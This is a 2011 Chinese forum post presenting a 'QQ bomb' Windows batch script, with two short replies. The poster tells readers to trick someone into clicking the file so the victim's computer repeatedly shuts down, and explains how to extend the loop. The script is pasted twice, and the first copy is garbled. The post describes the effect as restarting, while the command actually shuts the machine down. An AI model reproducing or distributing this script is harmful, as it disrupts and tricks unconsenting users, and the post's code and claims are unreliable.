淮滨论坛

标题: 『QQ炸弹』让对方电脑重启N次 [打印本页]

作者: 若。只如初见    时间: 2011-8-27 11:28
标题: 『QQ炸弹』让对方电脑重启N次
非常简单,复制以下代码到记事本: @echo off if not exist c:\1.txt echo. c:\1.txt goto err1 if not exist c:\2.txt echo. c:\2.txt goto err1 if not exist c:\3.txt echo. c:\3.txt goto e教大家一个非常简单的bat文件使用,这里可以当成QQ炸弹用。 以下的代码,如果你让对方点击了,他的电脑会连续重启5次。if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1goto err2:err1 shutdown -s -t 0 :err2 复制完以后,保存到记事本,把记事本文件更改为 .bat后缀的文件。如果你想让对方连续重新启动,那就无限的增加下去,如在if not exist c:\5.txt echo. >c:\5.txt & goto err1后面增加ifnot exist c:\5.txt echo. >c:\6.txt & goto err1
作者: 楚相后人    时间: 2011-8-27 14:53
+++++++++++
非常不愿意这样的玩笑开在我的身上。
作者: 那傷、眞淒涼    时间: 2011-8-27 15:00
我艹~
真的假de ~
噢也想恶作剧一下~




欢迎光临 淮滨论坛 (http://www.huaibin88.cn/) Powered by Discuz! X3.2